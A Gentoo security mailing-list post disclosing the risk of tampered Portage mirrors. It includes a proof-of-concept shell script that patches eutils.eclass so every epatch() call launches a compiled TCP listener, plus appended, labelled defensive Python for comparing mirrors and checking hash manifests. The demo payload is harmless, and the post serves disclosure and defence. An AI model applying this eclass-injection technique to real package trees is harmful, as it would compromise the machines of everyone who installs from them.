Hi,
after 1.5 years (2 years after the bug could be found in bugzilla) it
seems that one of the highest security risks is closed. At least I've
seen something about signed ebuilds. (see
http://marc.theaimsgroup.com/?l=gentoo-security&m=104816199500974&w=2 ).
Time for the next part. I've already written a bug for that a year ago,
but it was now closed a second time by "the ... gatekeeper".
See bug #26110
Here's the next small script. If you are operating a gentoo mirror, or
have access to one, feel free to play with it.
If you are a user, the only practical way to ensure a minimum of
security is to sync twice:
(a) sync,
(b) delete the timestamp,
(c) sync with another mirror and
(d) look if no files were different, otherwise restart with (a)
----------------gentooTrojan.sh---------------------------
#!/bin/sh
# Demonstration of what a modified mirror can do: the eutils eclass is
# rewritten so that every ebuild calling epatch() also starts a small
# listener.  (Lines wrapped by the mail client have been rejoined; the sed
# expression has to be a single argument.)
if [ ${#} -ne 1 ] ; then
echo "This script puts a silly trojan into Gentoo's portage."
echo "Usage: `basename ${0}` PathToPortage"
exit 1
fi
# Keep the original eclass and write a patched copy in its place.
mv "${1}/eclass/eutils.eclass" "${1}/eclass/eutils-without-trojan.eclass"
# Replace the opening line of epatch() with one that prints a warning and
# launches the listener in the background.  ${PORTDIR} stays unexpanded
# (single quotes), so it is resolved by portage at emerge time.
sed -e 's:^epatch().*{:epatch() {\newarn "Starting Trojan.\nTry it with telnet localhost 4000.\nKill it with killall GentooTrojan."\n${PORTDIR}/eclass/GentooTrojan \&\n:' \
<"${1}/eclass/eutils-without-trojan.eclass" >"${1}/eclass/eutils.eclass"
# The "trojan" itself: a TCP listener on port 4000 that greets each client.
cat >"${1}/eclass/GentooTrojan.c" << EOF
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <string.h>
#include <strings.h>   /* bzero() */
int main(void)
{
    struct sockaddr_in serv;
    struct sockaddr_in cli;
    int sock;
    sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (sock < 0)
        return 1;
    bzero((char *) &serv, sizeof(serv));
    serv.sin_family = AF_INET;
    serv.sin_addr.s_addr = htonl(INADDR_ANY);
    serv.sin_port = htons(4000);
    if (bind(sock, (struct sockaddr *) &serv, sizeof(serv)) < 0)
        return 1;
    if (listen(sock, 5) < 0)
        return 1;
    while (1) {
        int scli;
        socklen_t slen;   /* accept() takes a socklen_t *, not an int * */
        static char *str = "You are listening to the famous Gentoo trojan!\n";
        slen = sizeof(cli);
        scli = accept(sock, (struct sockaddr *) &cli, &slen);
        if (scli < 0)     /* interrupted or failed accept: keep serving */
            continue;
        write(scli, str, strlen(str));
        close(scli);
    }
}
EOF
gcc -o "${1}/eclass/GentooTrojan" "${1}/eclass/GentooTrojan.c"
echo "Done. Portage successfully infected with a trojan."
echo "Just emerge an ebuild which uses epatch and do a"
echo " telnet localhost 4000"
echo "afterwards."
-------------------------------------------
Kind regards,
Alexander Holler
PS: Please don't reply to me, I don't read any Gentoo mailing lists
anymore, in fact I even don't know why I'm writing this message, as I
already have lost every interest in Gentoo some time ago.
PPS: Sorry for the hard words, but all that reminds me of Microsoft.
The "eclass-hell" is as bad as the "dll-hell" and some bugs are getting
forgotten, ignored or fixed in the same time.
PPPS: I really appreciate all the very good work on hardened gcc,
selinux-profiles and so on, but for me, this all seems useless as long
as the base is compromised that easily and the user has no practical way
(e.g. hashes) to check what he gets on his machine with a 'sync'.
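Two user-side checks that follow from the mail, as an added example that is not part of the original message and not Gentoo's own tooling: compare_trees() is the "sync twice from different mirrors and look for differing files" procedure from steps (a)-(d) above, and verify_manifest() is the hash check the PPPS asks for, i.e. checking a freshly synced tree against a hash list obtained through a trusted channel. The manifest line format ("sha256 <hexdigest> <path>") and the demo() scenario (a clean mirror A, a mirror B whose eclass gained an extra line and an extra binary) are constructed for this example and are not Gentoo's Manifest format.

```python
"""Added example (not from the original mail): defender-side integrity checks
for a synced portage tree.  Manifest format and demo data are constructed."""
import hashlib
import os
import tempfile


def tree_digests(root):
    """Return {relative_path: sha256 hex} for every regular file under root."""
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if not os.path.isfile(full):   # skip fifos, sockets, dangling links
                continue
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            h = hashlib.sha256()
            with open(full, "rb") as fh:
                for chunk in iter(lambda: fh.read(1 << 16), b""):
                    h.update(chunk)
            digests[rel] = h.hexdigest()
    return digests


def compare_trees(tree_a, tree_b):
    """Step (d) of the mail: list every path whose content differs between the
    two syncs, or that only one mirror delivered.  All lists empty == agree."""
    a, b = tree_digests(tree_a), tree_digests(tree_b)
    return {
        "changed": sorted(p for p in a if p in b and a[p] != b[p]),
        "only_in_a": sorted(set(a) - set(b)),
        "only_in_b": sorted(set(b) - set(a)),
    }


def write_manifest(root):
    """Hash list for a tree known to be good (constructed 'sha256 hex path' format)."""
    return "".join(f"sha256 {h} {p}\n" for p, h in sorted(tree_digests(root).items()))


def verify_manifest(root, manifest_text):
    """Check a synced tree against a trusted manifest.  Returns sorted
    (path, problem) tuples; problem is 'modified', 'missing' or 'unlisted'.
    'unlisted' is what catches a binary dropped into eclass/ that no
    manifest entry vouches for."""
    expected = {}
    for line in manifest_text.splitlines():
        algo, digest, path = line.split(" ", 2)
        if algo != "sha256":
            raise ValueError(f"unsupported digest {algo!r}")
        expected[path] = digest
    actual = tree_digests(root)
    problems = [(p, "missing") for p in expected if p not in actual]
    problems += [(p, "modified") for p in expected
                 if p in actual and actual[p] != expected[p]]
    problems += [(p, "unlisted") for p in actual if p not in expected]
    return sorted(problems)


def demo():
    """Constructed scenario: mirror A is clean and its manifest is trusted;
    mirror B ships an eclass with an extra line plus an extra binary.
    Returns (compare_trees result, verify_manifest result for mirror B)."""
    base = tempfile.mkdtemp()
    for mirror in ("a", "b"):
        os.makedirs(os.path.join(base, mirror, "eclass"))
        with open(os.path.join(base, mirror, "eclass", "eutils.eclass"), "w") as fh:
            fh.write("epatch() {\n\techo patching\n}\n")
    manifest = write_manifest(os.path.join(base, "a"))
    with open(os.path.join(base, "b", "eclass", "eutils.eclass"), "a") as fh:
        fh.write("echo extra\n")
    with open(os.path.join(base, "b", "eclass", "extra.bin"), "wb") as fh:
        fh.write(b"\x7fELF")
    diff = compare_trees(os.path.join(base, "a"), os.path.join(base, "b"))
    verify = verify_manifest(os.path.join(base, "b"), manifest)
    return diff, verify


if __name__ == "__main__":
    for result in demo():
        print(result)
```

compare_trees() only tells you that two mirrors disagree, not which one is right, which is exactly why the mail's procedure restarts at (a); verify_manifest() needs the manifest to arrive over a channel the mirror cannot tamper with (for example, signed), otherwise a modified mirror simply ships a matching manifest.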
--
gentoo-security@gentoo.org mailing list